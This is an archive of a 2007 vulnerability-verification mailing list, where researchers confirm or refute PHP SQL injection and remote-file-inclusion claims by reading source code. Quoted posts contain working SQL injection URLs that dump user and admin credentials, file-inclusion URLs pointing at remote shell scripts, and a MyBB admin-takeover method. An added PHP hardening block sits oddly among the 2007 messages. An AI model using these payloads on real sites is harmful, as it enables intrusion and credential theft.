From coley at mitre.org Wed Apr 11 22:13:08 2007
From: coley at mitre.org (Steven M. Christey)
Date: Wed, 11 Apr 2007 18:13:08 -0400 (EDT)
Subject: [VIM] Rediscovery: Flexphpnews news.php/newsid SQL injection
Message-ID: <200704112213.l3BMD832026426@faron.mitre.org>

Researcher: Dj7xpl
Ref: http://www.milw0rm.com/exploits/3631

Rediscovery of CVE-2005-1237 - same vectors (newsid param and news.php), same bug type.

Also: verified by source inspection by one of our team members.

news.php has:

require("./NewsSql.inc.php");
$result = $db->getnewsbyid($newsid);

NewsSql.inc.php has:

function getnewsbyid($newsid)
...
$sql = "select * from news where newsid='$newsid'";
...
$result = $this->select($sql);
- Steve From coley at mitre.org Wed Apr 11 22:47:29 2007 From: coley at mitre.org (Steven M. Christey) Date: Wed, 11 Apr 2007 18:47:29 -0400 (EDT) Subject: [VIM] WF-Sections SQL injection vendor ack; shows up in other modules Message-ID: <200704112247.l3BMlTW5027136@faron.mitre.org> Researcher: ajann Refs: milw0rm 3644, 3645, 3646 Probably only OSVDB and CVE make these distinctions, but these recent disclosures all seem to stem from the same core module called "WF-Section: 1.01 (which was apparently renamed to "WF-Sections 1.02" in the fix). Looks like WF-Section(s) was popular enough that others wanted to modify it. Vendor ack is here: http://www.xoops.org/modules/news/article.php?storyid=3717 http://addons.zarilia.com/index.php?page_type=static&id=43 Diff's between WF-Sections 1.02's print.php and the print.php's from zmagazine and XFsection show sufficient commonality, but also demonstrate that the modifications of the original WF-Sections code were more than just a couple cosmetic changes, although version discrepancies are probably making things worse, too. - Steve From coley at linus.mitre.org Wed Apr 11 23:03:15 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Wed, 11 Apr 2007 19:03:15 -0400 (EDT) Subject: [VIM] [false] Remote File Include In Script stat12 In-Reply-To: References: Message-ID: Darkfig, Agreed - I accidentally did a similar investigation because I forgot you had posted this :) I have no idea where the "stat12" came from since it's not part of the live site that appears to have the unparsed i-Stats code. If you change the "counter.php" on the live site to index.php, which was the program in the original disclosure, you have: require_once(LANGPATH . $cfg['langFile']); which obviously is not a "langpath" parameter. Hey Gadi - RaeD seems to be one of the worst offenders right now and identifies as Israeli. Do you feel like using your subtle, non-confrontational style to see if he can change his ways? 
;-) - Steve On Tue, 3 Apr 2007, GM darkfig wrote: > Message: http://www.securityfocus.com/archive/1/464582/30/0/threaded > Author: RaeD at BsdMail.Com > > When we search "Copyright (c) 2004 by Sam Tang" there is only one > result (1) and on the server, the php is not interpreted ... we can > read the source code. The title of the script is not "stat12" but "PHP > i-Stats". The website (2) of the author is down. The file inclusion > will not work : require_once('global.php');...define('LANGPATH', > 'lang/'); > > [1] - http://www.tiger.edu.pl/ > [2] - http://www.samphp.com > From coley at mitre.org Wed Apr 11 23:57:09 2007 From: coley at mitre.org (Steven M. Christey) Date: Wed, 11 Apr 2007 19:57:09 -0400 (EDT) Subject: [VIM] Cyboards PHP RFI: true for 1.21, fixed in at least 1.25 Message-ID: <200704112357.l3BNv9WH028519@faron.mitre.org> Researcher: bd0rk Ref: http://www.milw0rm.com/exploits/3660 Version 1.21 is the URL provided by the researcher. Version 1.25 was obtained from http://www.hotscripts.com/Detailed/10651.html A diff of include/default_header.php says: diff -r cyboards-morph/include/default_header.php cyboards/include/default_header.php 13,15c13 < echo ""; --- > echo "\n\n"; So, the include got removed sometime between 1.21 and 1.25, probably accidentally. - Steve From coley at mitre.org Thu Apr 12 00:09:36 2007 From: coley at mitre.org (Steven M. Christey) Date: Wed, 11 Apr 2007 20:09:36 -0400 (EDT) Subject: [VIM] dispute: older CyBoards common.php RFI (CVE-2006-2871) Message-ID: <200704120009.l3C09aQt028751@faron.mitre.org> Researcher: SpC-x Ref: CyBoards PHP Lite v1.25 (common.PHP) Remote File Inclusion http://www.securityfocus.com/archive/1/archive/1/435977/100/0/threaded Using the 1.25 code referenced in the previous post, we have: include("/home/www/forums/include/config.php"); include($script_path."/db/mysql.php"); ... and later uses. 
Inspections suggests that a failed inclusion would cause lots of problems, so the pathname would need to be changed during installation; this is also documented in readme.txt. config.php itself has: $script_path = "/home/www/forums"; // Unix path to the forum directory. Do not include a trailing slash config.php doesn't have any nested includes, requires, dynamic evaluation, or extract. $script_path is used in other include's in common.php but have the same negative results. - Steve From gmdarkfig at gmail.com Thu Apr 12 17:25:16 2007 From: gmdarkfig at gmail.com (GM darkfig) Date: Thu, 12 Apr 2007 19:25:16 +0200 Subject: [VIM] Milw0rm 3719 (Mybb <= 1.2.2) Message-ID: The guy use the same vulnerability I found (http://acid-root.new.fr/poc/28070403.txt). He use the same method (benchmark(), Client-IP, DELETE from prefix_sessions WHERE ip='[SQL]', and a debug mod like me :) ). It's just the perl version. He use the solution number 1 I said in my exploit: # SOLUTION NUMBER 1 # mysql> select * from mybb_users\G # *************************** 1. row *************************** # uid: 1 # username: root # password: 39ac8681f5cf4fcd9c9c09719a618bd3 # salt: BFeJBOCF # loginkey: VYLJia9InmLgM1PT6v2whyMbaoSuprngLnkW55j3zlywItyZBA... # # $xpl->post($url.'admin/index.php','username=root&password=toor&do=login&goto='); # print $xpl->getcontent(); // ...Welcome to the MyBB Administration Control Panel... # # SOLUTION NUMBER 2 # mysql> select * from mybb_adminsessions\G # *************************** 1. row *************************** # sid: 81e267263b9254f3aaf670383bfbfec9 # uid: 1 # loginkey: VYLJia9InmLgM1PT6v2whyMbaoSuprngLnkW55j3zlywItyZBA # ip: 127.0.0.1 # dateline: 1175443967 # lastactive: 1175444369 # # $xpl->addheader('Client-IP','127.0.0.1'); # $xpl->get($url.'admin/index.php?adminsid=81e267263b9254f3aaf670383bfbfec9'); # print $xpl->getcontent(); // ...Welcome to the MyBB Administration Control Panel... # # I decided to use the solution number 2. 
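The root cause darkfig names above (a session-cleanup query whose WHERE clause carries an IP string that the application took from the Client-IP header) is worth seeing next to its fix. The PHP below is an added illustration written for this archive, not code from MyBB or from either exploit; the function names, the `sessions` table and the trusted-proxy address are assumptions made for the example.

```php
<?php
// Added example, not MyBB's code: a constructed stand-in for a session-cleanup
// query whose WHERE clause carries an IP string taken from the request.

// Vulnerable shape: the IP is spliced into the SQL text, so whatever arrived in
// the Client-IP header becomes part of the statement. This is the
// "DELETE FROM prefix_sessions WHERE ip='[SQL]'" shape discussed in the thread;
// timing probes such as BENCHMARK() only work because the input is executed
// as SQL instead of being compared as data.
function delete_sessions_unsafe(mysqli $db, string $prefix, string $ip): bool
{
    $sql = "DELETE FROM {$prefix}sessions WHERE ip='{$ip}'";
    return $db->query($sql) !== false;
}

// Hardened shape: the table prefix comes from application configuration (never
// from the request), the IP is validated as an address first, and it reaches
// the server as a bound parameter so it can only be compared, never parsed.
function delete_sessions_safe(mysqli $db, string $prefix, string $ip): bool
{
    if (filter_var($ip, FILTER_VALIDATE_IP) === false) {
        return false;                       // reject anything that is not an IP
    }
    $stmt = $db->prepare("DELETE FROM {$prefix}sessions WHERE ip = ?");
    if ($stmt === false) {
        return false;
    }
    $stmt->bind_param('s', $ip);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}

// Resolving the client address: Client-IP / X-Forwarded-For style headers are
// attacker-supplied unless the request really came from a proxy you operate.
// Only then is the header consulted, and even then it must parse as an IP.
function client_ip(array $server, array $trusted_proxies): string
{
    $remote = $server['REMOTE_ADDR'] ?? '';
    if (in_array($remote, $trusted_proxies, true) && isset($server['HTTP_CLIENT_IP'])) {
        $candidate = trim($server['HTTP_CLIENT_IP']);
        if (filter_var($candidate, FILTER_VALIDATE_IP) !== false) {
            return $candidate;
        }
    }
    return $remote;
}

// Constructed request: the transport address is not a trusted proxy, and the
// Client-IP header carries a string that is not an address at all.
$server = [
    'REMOTE_ADDR'    => '203.0.113.7',
    'HTTP_CLIENT_IP' => "127.0.0.1' OR 'a'='a",
];
$trusted = ['10.0.0.2'];                 // assumed reverse-proxy address
$ip = client_ip($server, $trusted);      // header honoured only behind a trusted proxy

// Even if the header value had reached the query, the safe variant refuses it:
// filter_var() fails on the non-IP string and no statement is sent.
// Wiring with assumed credentials (not executed here):
// $db = new mysqli('localhost', 'user', 'pass', 'forum');
// delete_sessions_safe($db, 'mybb_', $ip);
```

Two separate controls are at work: `client_ip()` stops a forged header from being treated as the peer address in the first place, and `delete_sessions_safe()` makes the query safe regardless of where the string came from, so a regression in one does not reopen the hole.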
From str0ke at milw0rm.com Thu Apr 12 17:51:58 2007 From: str0ke at milw0rm.com (str0ke) Date: Thu, 12 Apr 2007 12:51:58 -0500 Subject: [VIM] Milw0rm 3719 (Mybb <= 1.2.2) In-Reply-To: References: Message-ID: <814b9d50704121051m3d9f011dm87dd5b08dde7c07c@mail.gmail.com> It was posted to go along with his paper that went up today. Guessing he just wanted to show an example of it in action. http://www.milw0rm.com/papers/149 /str0ke On 4/12/07, GM darkfig wrote: > The guy use the same vulnerability I found > (http://acid-root.new.fr/poc/28070403.txt). > He use the same method (benchmark(), Client-IP, DELETE from > prefix_sessions WHERE ip='[SQL]', and a debug mod like me :) ). It's > just the perl version. He use the solution number 1 I said in my > exploit: > > # SOLUTION NUMBER 1 > # mysql> select * from mybb_users\G > # *************************** 1. row *************************** > # uid: 1 > # username: root > # password: 39ac8681f5cf4fcd9c9c09719a618bd3 > # salt: BFeJBOCF > # loginkey: VYLJia9InmLgM1PT6v2whyMbaoSuprngLnkW55j3zlywItyZBA... > # > # $xpl->post($url.'admin/index.php','username=root&password=toor&do=login&goto='); > # print $xpl->getcontent(); // ...Welcome to the MyBB Administration > Control Panel... > # > # SOLUTION NUMBER 2 > # mysql> select * from mybb_adminsessions\G > # *************************** 1. row *************************** > # sid: 81e267263b9254f3aaf670383bfbfec9 > # uid: 1 > # loginkey: VYLJia9InmLgM1PT6v2whyMbaoSuprngLnkW55j3zlywItyZBA > # ip: 127.0.0.1 > # dateline: 1175443967 > # lastactive: 1175444369 > # > # $xpl->addheader('Client-IP','127.0.0.1'); > # $xpl->get($url.'admin/index.php?adminsid=81e267263b9254f3aaf670383bfbfec9'); > # print $xpl->getcontent(); // ...Welcome to the MyBB Administration > Control Panel... > # > # I decided to use the solution number 2. > From coley at mitre.org Thu Apr 12 17:55:00 2007 From: coley at mitre.org (Steven M. 
Christey) Date: Thu, 12 Apr 2007 13:55:00 -0400 (EDT) Subject: [VIM] true: SimpCMS Light RFI Message-ID: <200704121755.l3CHt01p018840@faron.mitre.org> Researcher: Dr.RoVeR Ref: http://www.milw0rm.com/exploits/3705 index.php calls functions.php, which itself contains: if (isset($_GET[site])) { $site=$_GET[site]; } else { $site= "home"; } Later in index.php, we see the 'include $site.".php"' referenced by the researcher. So, in this case, it looks like we don't need register_globals. - Steve From coley at mitre.org Thu Apr 12 18:17:03 2007 From: coley at mitre.org (Steven M. Christey) Date: Thu, 12 Apr 2007 14:17:03 -0400 (EDT) Subject: [VIM] true: Request It : Song Request System 1.0b RFI Message-ID: <200704121817.l3CIH3EN019352@faron.mitre.org> Researcher: hackberry.ath.cx Ref: Request It : Song Request System 1.0b - remote file inclusion http://www.securityfocus.com/archive/1/archive/1/465081/100/0/threaded Source inspection confirmed this: if(isset($id)) { if($id == 'home') { $id = "list"; } include($id.".php"); } - Steve From str0ke at milw0rm.com Thu Apr 12 18:34:41 2007 From: str0ke at milw0rm.com (str0ke) Date: Thu, 12 Apr 2007 13:34:41 -0500 Subject: [VIM] true: SimpCMS Light RFI In-Reply-To: <200704121755.l3CHt01p018840@faron.mitre.org> References: <200704121755.l3CHt01p018840@faron.mitre.org> Message-ID: <814b9d50704121134v75f17ea4n9c17cca023abde6a@mail.gmail.com> Seems that the Medium / Heavy versions are also affected. /str0ke On 4/12/07, Steven M. Christey wrote: > > Researcher: Dr.RoVeR > Ref: http://www.milw0rm.com/exploits/3705 > > index.php calls functions.php, which itself contains: > > if (isset($_GET[site])) > { > $site=$_GET[site]; > } > else > { > $site= "home"; > } > > Later in index.php, we see the 'include $site.".php"' referenced by > the researcher. > > So, in this case, it looks like we don't need register_globals. > > - Steve > From coley at mitre.org Thu Apr 12 18:45:03 2007 From: coley at mitre.org (Steven M. 
Christey) Date: Thu, 12 Apr 2007 14:45:03 -0400 (EDT) Subject: [VIM] probably false: xodagallery execution claim Message-ID: <200704121845.l3CIj34F019910@faron.mitre.org> Researcher: the_3dit0r Ref: xodagallery Remote Code Execution Vulnerability http://www.securityfocus.com/archive/1/archive/1/465088/100/0/threaded Extracted code is: switch ($_GET['cmd']) line 64 Source inspection did not find a vulnerable use of cmd within this file. The above switch tests for constant values of $_GET['cmd']. There are some leading require's, but they seem pretty shallow. Grep throughout the entire system doesn't produce any "cmd" matches of interest. Since a lot of PHP code shells support "cmd", maybe this was tested against a previously hacked application with a backdoor in it. Assuming it was tested. - Steve From str0ke at milw0rm.com Thu Apr 12 19:32:19 2007 From: str0ke at milw0rm.com (str0ke) Date: Thu, 12 Apr 2007 14:32:19 -0500 Subject: [VIM] [milw0rm] 3720 & 2613 Message-ID: <814b9d50704121232i27d8c451p49577e3725571dec@mail.gmail.com> 3720 is a duplicate of 2613, removing 3720. /str0ke From theall at tenablesecurity.com Fri Apr 13 15:25:30 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Fri, 13 Apr 2007 11:25:30 -0400 Subject: [VIM] Dup: TOSMO/Mambo 1.4.13a (absolute_path) Remote File Inclusion Vulns Message-ID: <461FA0EA.6080903@tenablesecurity.com> Milw0rm 3707 seems to be a dup of 2030, attributed to Matdhule last July. [Which also means Bugtraq 23416 duplicates 18998.] TOSMO/Mambo merely bundles the affected software in it. George -- theall at tenablesecurity.com From str0ke at milw0rm.com Fri Apr 13 18:02:42 2007 From: str0ke at milw0rm.com (str0ke) Date: Fri, 13 Apr 2007 13:02:42 -0500 Subject: [VIM] DUP?: [waraxe-2007-SA#048] - Multiple vulnerabilities in Virtual War 1.5 module for PhpNuke Message-ID: <814b9d50704131102r2e7350aaxc818b497b1f00944@mail.gmail.com> It seems brOmstar discovered the sql injection vulnerability in mid-2006. 
http://www.milw0rm.com/exploits/2170 /str0ke ---------- Forwarded message ---------- From: come2waraxe at yahoo.com Date: 13 Apr 2007 16:01:13 -0000 Subject: [waraxe-2007-SA#048] - Multiple vulnerabilities in Virtual War 1.5 module for PhpNuke To: bugtraq at securityfocus.com [waraxe-2007-SA#048] - Multiple vulnerabilities in Virtual War 1.5 module for PhpNuke Author: Janek Vind "waraxe" Date: 13. April 2007 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-48.html Target software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ VWar module for PhpNuke http://www.vwar.de/ VWar is a webbased matchorganizing system for online gamers. The complete output is realised by PHP with MySQL as database backend. The system is divided into 2 parts, the public area and the admin area. VWar 1.5.0 R15 is out. Changes: fixed: mysql injection bug in extra/ files // I guess, they have not fixed all the bugs yet :) // Affected are Virtual War versions 1.5 R15 and below Vulnerabilities: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Found security bugs: one critical sql injection and two XSS bugs. There are probably more vulnerabilities, had no time for deeper analyze ... 1. XSS in "/modules/vwar/extra/today.php" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.target.com/modules/vwar/extra/today.php?whattoshow=3&title=kala Problem is caused by uninitialized variable "$title". Successful exploitation requires that "register_globals" is "on" in php settings. 2. XSS in "/modules/vwar/extra/login.php" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.target.com/modules/vwar/extra/login.php?memberlist= Similar to previous case this XSS is caused by uninitialized variable, in this time "$memberlist". Successful exploitation requires that "register_globals" is "on" in php settings. 3. 
Critical sql injection bug in many VWar scripts ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Personally, I like uninitialized variables in php source code. They are giving so much cool possibilities to everyone, who is searching for secutity holes. And this serious sql injection case has his roots in same problem. Let's look @ "/modules/vwar/extra/online.php" line 63: ----------------[ from source code ]------------------ $query = $vwardb->query(" SELECT memberid, name, lastactivity FROM vwar".$n."_member WHERE lastactivity > ".(time() - $onlinetime * 60)." "); ----------------[ /from source code ]----------------- And by the way - "$n" variable is not initialized! So what happens, if we issue this query: http://www.victim.com/modules/vwar/extra/online.php?n=waraxe Oops... We got error message: -> Database Error: Invalid SQL: SELECT memberid, name, lastactivity FROM vwarwaraxe_member WHERE lastactivity > 1176476015 -> MySQL Error: Table 'victimdb.vwarwaraxe_member' doesn't exist -> MySQL Error Number: 1146 -> Date: 11.04.2007 @ 18:03 -> Script: /modules/vwar/extra/online.php?n=waraxe -> Referer: Now, can we exploit this sql injection? Let's try next move: http://www.victim.com/modules/vwar/extra/online.php?n=_member+WHERE+0+UNION+ALL+SELECT+1,@@version,3/* 4.1.22 It works!! Now it's time for more serious fun: [[[[[ kidd0z - attentione ]]]]] http://www.victim.com/modules/vwar/extra/online.php?n=_member+WHERE+0+ UNION+ALL+SELECT+1,CONCAT(name,CHAR(94),password,CHAR(94),email),3+FROM+vwar_member/* ... and we get all vwar member usernames, password double-md5 hashes and emails http://www.victim.com/modules/vwar/extra/online.php?n=_member+WHERE+0+ UNION+ALL+SELECT+1,CONCAT(aid,CHAR(94),pwd,CHAR(94),email),3+FROM+nuke_authors/* ... 
and we have all the nuke admin usernames, md5 hashes and emails http://www.victim.com/modules/vwar/extra/online.php?n=_member+WHERE+0+ UNION+ALL+SELECT+1,CONCAT(username,CHAR(94),user_password,CHAR(94),user_email),3+FROM+nuke_users/* ... and finally, all the nuke user credentials in one big listing :) Remarks: R01 - Sentinel, Protector and other powerful phpnuke protection systems - they will not work against this exploits. Because we are not entering from front door, but will use rear window :) R02 - "register_globals" must be "on" for exploits to work R03 - phpnuke table prefix can be changed from default, in this case - no nuke user and admin data! R04 - there can be need for playing with "$n" value. Because vwar module installer can assaign different values besides empty value. So if default exploit will not work, then this can be tried: /online.php?n=0_member+WHERE /online.php?n=1_member+WHERE /online.php?n=2_member+WHERE ... and so on. And because we have perfect sql error feedback, then it is easy to overcome various exploiting problems. R05 - many other scripts in "extra" directory have same sql injection vulnerability! See ya soon and have a nice day ;) Greetings: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Greets to LINUX, Heintz, slimjim100, shai-tan, y3dips and all other people who know me! Special greets goes to Raido Kerna. Tervitusi Torufoorumi rahvale! Contact: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ come2waraxe at yahoo.com Janek Vind "waraxe" Homepage: http://www.waraxe.us/ Shameless advertise: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ DX expedition database - http://www.dxdb.com/ Amateur Radio Database - http://www.hamdb.com/ ---------------------------------- [ EOF ] ------------------------------------ From gmdarkfig at gmail.com Sat Apr 14 08:50:47 2007 From: gmdarkfig at gmail.com (GM darkfig) Date: Sat, 14 Apr 2007 10:50:47 +0200 Subject: [VIM] false: Vbulletin 3.6.5 Sql Injection ! 
[misc.php] Message-ID: Title: Vbulletin 3.6.5 Sql Injection ! [misc.php] Link: http://www.securityfocus.com/archive/1/465647/30/0/threaded Author: seko at se-ko.info (SekoMirza) print q{ ###################################################### # DeluxeBB Remote SQL Injection Exploit # # vbulletin Remote SQL Injection Exploit # # // SekoMirza // Turkish Hackerz # ###################################################### }; He just modified this exploit (DeluxeBB 1.06 Remote SQL Injection Exploit) http://www.milw0rm.com/exploits/1793. From theall at tenablesecurity.com Sat Apr 14 11:21:40 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Sat, 14 Apr 2007 07:21:40 -0400 Subject: [VIM] false: Vbulletin 3.6.5 Sql Injection ! [misc.php] In-Reply-To: References: Message-ID: <4620B944.1060906@tenablesecurity.com> On 04/14/07 04:50, GM darkfig wrote: > He just modified this exploit (DeluxeBB 1.06 Remote SQL Injection > Exploit) http://www.milw0rm.com/exploits/1793. Is vBulletin affected? In looking around, I found vBulletin installs that do have a misc.php, but it didn't seem like they make use of a parameter named 'sub'. George -- theall at tenablesecurity.com From gmdarkfig at gmail.com Sat Apr 14 12:12:55 2007 From: gmdarkfig at gmail.com (GM darkfig) Date: Sat, 14 Apr 2007 14:12:55 +0200 Subject: [VIM] false: Vbulletin 3.6.5 Sql Injection ! [misc.php] In-Reply-To: <4620B944.1060906@tenablesecurity.com> References: <4620B944.1060906@tenablesecurity.com> Message-ID: Not affected. They just have the same filename, not the same content. 2007/4/14, George A. Theall : > On 04/14/07 04:50, GM darkfig wrote: > > > He just modified this exploit (DeluxeBB 1.06 Remote SQL Injection > > Exploit) http://www.milw0rm.com/exploits/1793. > > Is vBulletin affected? In looking around, I found vBulletin installs > that do have a misc.php, but it didn't seem like they make use of a > parameter named 'sub'. 
> > George > -- > theall at tenablesecurity.com > From str0ke at milw0rm.com Sat Apr 14 17:19:04 2007 From: str0ke at milw0rm.com (str0ke) Date: Sat, 14 Apr 2007 12:19:04 -0500 Subject: [VIM] true until installed: MobilePublisherphp v1.1.2 Remote File Include Vulnerabilities Message-ID: <814b9d50704141019l2935983dkf9167f2249b3783b@mail.gmail.com> Once the product is installed it doesn't seem vulnerable since require "../config.php"; contains the $auth_method variable. After checking header.php in the root directory (the second included file) it does seem vulnerable to rfi. wrote: > """"""""""""""""""""""""""""""""""""""""""""""" > """ :: :: ::::: :::: """ > """ :: :: :: : :: """ > """ :::: :: :: ::::: ::::: :::: """ > """ :: :: ::: ::: :: :: :: :: :: """ > """ :: :: :: : : ::::: :: :: :::: """ > """ """ > """"""""""""""""""""""""""""""""""""""""""""""" > Xmor$ Security Vulnerability Research TM > > > # Tilte: MobilePublisherphp v1.1.2 Remote File Include Vulnerabilities > > > # Author..................: [the_Edit0r] > # HomePage ...............: [Www.XmorS-sEcurity.coM] > # Location ...............: [Iran] > # Software ...............: [MobilePublisherphp] > # Impact..................: [ Remote ] > # Site Script ............: [http://sourceforge.net/projects/mpphp/] > # We ArE .................: [ Scorpiunix,KAMY4r,Zer0.Cod3r,SilliCONIC,D3vil_B0y_ir,S.W.A.T,DarkAngel ] > > > > > > ------------------------------- proof Of Concept --------------------------- > > > > www.example.com/[path]/admin/index.php?auth_method=[Shell-Script] > www.example.com/[path]/admin/list.php?auth_method=[Shell-Script] > www.example.com/[path]/admin/postreview.php?auth_method=[Shell-Script] > www.example.com/[path]/admin/reindex.php?auth_method=[Shell-Script] > www.example.com/[path]/admin/sections.php?auth_method=[Shell-Script] > www.example.com/[path]/admin/templates.php?auth_method=[Shell-Script] > www.example.com/[path]/admin/userinfo.php?auth_method=[Shell-Script] > 
www.example.com/[path]/admin/users.php?auth_method=[Shell-Script] > www.example.com/[path]/admin/view.php?auth_method=[Shell-Script] > > > ---------------------------------------------------------------------------- > > > > > > # Contact me : the_3dit0r[at]Yahoo[dot]coM > > # [XmorS-SEcurity.coM] > > > From str0ke at milw0rm.com Sat Apr 14 17:53:23 2007 From: str0ke at milw0rm.com (str0ke) Date: Sat, 14 Apr 2007 12:53:23 -0500 Subject: [VIM] false: Maian Search v1.1 Message-ID: <814b9d50704141053h3674e75dpa0055218bffff459@mail.gmail.com> The script contains the below, lines 18/20. if (isset($_GET['path_to_folder'])) { exit; } $path_to_folder = dirname(__FILE__).'/'; /str0ke ---------- Forwarded message ---------- From: k4rtal at gmail.com Date: 14 Apr 2007 15:24:03 -0000 Subject: Maian Search v1.1 To: bugtraq at securityfocus.com ########################################################################### # # Script Name : Maian Search v1.1 # # Download : http://www.maianscriptworld.co.uk/freestuff_1975_search.html # # Coded by : KaRTaL # # Contact : k4rtal[at]gmail[dot]com ########################################################################### # # Include : include($path_to_folder.'inc/db_connection.inc.php'); # # # Exploit : search.php?path_to_folder=http://sheladresin.com/r57.txt?cmd=id # # ########################################################################### # # # Thankxz : D3ngsz | Ekin0x | Doublekickx | Cr at zy_King | M3rhametsiz | MaNaR # # # # # Dengesiz Team ########################################################################### From gmdarkfig at gmail.com Sun Apr 15 12:45:54 2007 From: gmdarkfig at gmail.com (GM darkfig) Date: Sun, 15 Apr 2007 14:45:54 +0200 Subject: [VIM] false: phpMyChat-0.14.5 Message-ID: Link: http://www.securityfocus.com/archive/1/465741/30/0/threaded Author: k4rtal[at]gmail[dot]com Quote from the thread: "exploit : phpMyChat.php3?{ChatPath}=http://shelladresin.com/shell.txt?cmd=id" phpMyChat.php3: $ChatPath = "chat/"; 
require("./${ChatPath}lib/index.lib.php3"); From gmdarkfig at gmail.com Sun Apr 15 12:46:22 2007 From: gmdarkfig at gmail.com (GM darkfig) Date: Sun, 15 Apr 2007 14:46:22 +0200 Subject: [VIM] false: bloofoxCMS 0.2.2 Remote File Include Vulnerabilitiy Message-ID: Link: http://www.securityfocus.com/archive/1/465739/30/0/threaded Author: the_3dit0r at yahoo.com Quote from the thread: "www.example.com/[path]/install/index.php?content_php=[shell-Script]" install/index.php: include(SYS_WORK_DIR."/page_handler.php"); page_handler.php: case '3': $content_title = $strStep3; $content_html = "step3.html"; $content_php = "step3.php"; break; case '2': $content_title = $strStep2; $content_html = "step2.html"; $content_php = "step2.php"; break;[...] install/index.php (after): include(SYS_WORK_DIR."/".$content_php); From gmdarkfig at gmail.com Sun Apr 15 12:46:46 2007 From: gmdarkfig at gmail.com (GM darkfig) Date: Sun, 15 Apr 2007 14:46:46 +0200 Subject: [VIM] false: Maian Weblog v3.1 Message-ID: Link: http://www.securityfocus.com/archive/1/465735/30/0/threaded Author: k4rtal[at]gmail[dot]com Quote from the thread: "index.php?path_to_folder=http://shelladresin.com/r57.txt?cmd=id" index.php: if (isset($_GET['path_to_folder'])) { exit; } $path_to_folder = dirname(__FILE__).'/'; From gmdarkfig at gmail.com Sun Apr 15 12:47:05 2007 From: gmdarkfig at gmail.com (GM darkfig) Date: Sun, 15 Apr 2007 14:47:05 +0200 Subject: [VIM] false: Back-End CMS Database Tables v0.4.7 Remote File Include Vulnerabilities Message-ID: Link: http://www.securityfocus.com/archive/1/465734/30/0/threaded Author: the_Edit0r Quote from the thread: "www.example.com/[path]/htdocs/site-admin/index.php?includes_path=[Shell-Script]" index.php (and the others files): require("includes_path.php"); require($includes_path . 
"/includes.inc"); includes_path.php: $includes_path = "/home/be480/includes"; From gmdarkfig at gmail.com Sun Apr 15 12:47:23 2007 From: gmdarkfig at gmail.com (GM darkfig) Date: Sun, 15 Apr 2007 14:47:23 +0200 Subject: [VIM] false: B2evolution 1.6 RFi Message-ID: Link: http://www.securityfocus.com/archive/1/465733/30/0/threaded Author: k4rtal[at]gmail[dot]com Quote from the thread: "script_path/blogs/index.php?core_subdir=http://shelladresi,.com/r57.txt?cmd=id" Even if there was a vulnerability, RFI is not possible. And there is no LFI. index.php: require_once dirname(__FILE__).'/evocore/_main.inc.php'; _main.inc.php: require_once dirname(__FILE__).'/../conf/_config.php'; _config.php: require_once dirname(__FILE__).'/_advanced.php'; _advanced.php: $core_subdir = 'evocore/'; From gmdarkfig at gmail.com Sun Apr 15 12:47:36 2007 From: gmdarkfig at gmail.com (GM darkfig) Date: Sun, 15 Apr 2007 14:47:36 +0200 Subject: [VIM] false: Maian Gallery v1.0 Message-ID: Link: http://www.securityfocus.com/archive/1/465732/30/0/threaded Author: k4rtal[at]gmail[dot].com Quote from the thread: "index.php?path_to_folder=http://sheladresin.com/r57.txt?cmd=id" index.php: if (isset($_GET['path_to_folder'])) { exit; } $path_to_folder = dirname(__FILE__).'/'; From coley at linus.mitre.org Mon Apr 16 01:26:12 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Sun, 15 Apr 2007 21:26:12 -0400 (EDT) Subject: [VIM] false: phpMyChat-0.14.5 In-Reply-To: References: Message-ID: Wow, that's some of the strongest evidence of "grep and gripe" I've seen yet. Ouch. Assuming that PHP doesn't treat "{}" as valid variable characters... ya never really know with that language. 
On Sun, 15 Apr 2007, GM darkfig wrote: > Link: http://www.securityfocus.com/archive/1/465741/30/0/threaded > Author: k4rtal[at]gmail[dot]com > > Quote from the thread: > "exploit : phpMyChat.php3?{ChatPath}=http://shelladresin.com/shell.txt?cmd=id" > > phpMyChat.php3: > $ChatPath = "chat/"; > require("./${ChatPath}lib/index.lib.php3"); > From theall at tenablesecurity.com Mon Apr 16 18:46:31 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Mon, 16 Apr 2007 14:46:31 -0400 Subject: [VIM] Dup: Gallery 1.2.5 (GALLERY_BASEDIR) Multiple RFI Vulnerabilities Message-ID: <4623C487.5050703@tenablesecurity.com> The issues covered by Milw0rm 3743 / Bugtraq 23502 are a subset of those posted back in 2002 by avart at gmx.de; eg, http://archives.neohapsis.com/archives/bugtraq/2002-07/0471.html and covered by CVE-2002-1412 / Bugtraq 5375. Or am I missing something? George -- theall at tenablesecurity.com From coley at linus.mitre.org Mon Apr 16 21:42:34 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Mon, 16 Apr 2007 17:42:34 -0400 (EDT) Subject: [VIM] Dup: Gallery 1.2.5 (GALLERY_BASEDIR) Multiple RFI Vulnerabilities In-Reply-To: <4623C487.5050703@tenablesecurity.com> References: <4623C487.5050703@tenablesecurity.com> Message-ID: No, looks like a dupe to me, too. In this case, CVE-2002-1412 was already claimed to affect versions before 1.3.1, with vendor acknowledgement and fix. If this new disclosure had been for a NEWER version than 1.3.1, then this might have been a regression error and could be argued to get a new tag (certainly for CVE it would). But since this newer disclosure is actually for an OLDER version than what was already reported, CVE assumes there was no regression (for the sake of sanity). i.e., they are dupes. - Steve On Mon, 16 Apr 2007, George A. 
